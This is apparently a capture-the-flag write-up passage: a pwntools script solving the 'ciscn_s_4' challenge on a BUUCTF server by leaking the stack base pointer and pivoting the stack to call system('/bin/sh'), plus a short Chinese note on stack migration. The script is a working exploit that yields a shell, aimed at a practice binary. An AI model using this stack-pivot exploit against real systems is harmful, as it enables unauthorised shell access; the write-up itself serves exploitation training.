from pwn import*from LibcSearcher import*context.log_level = 'debug'io = remote("node4.buuoj.cn",25235)#io = process('./ciscn_s_4')elf = ELF('./ciscn_s_4')system_addr = elf.sym['system']leave_addr =0x080485FDio.recv()payload = b'a'*0x24+'bbbb'io.send(payload)io.recvuntil('bbbb')ebp_addr = u32(io.recv(4))log.success('ebp_addr:'+hex(ebp_addr))payload = 'bbbb'+p32(system_addr)+b'aaaa'+p32(ebp_addr-0x38+16)+'/bin/sh\x00'payload = payload.ljust(0x28,'\x00')payload += p32(ebp_addr-0x38)+p32(leave_addr)io.send(payload)io.interactive()
总结一下,栈迁移一般都会遇到两次输入,然后呢,bss段可执行就可以往bss段上写,不行就得往栈上迁移。
若有收获,就点个赞吧
0 人点赞
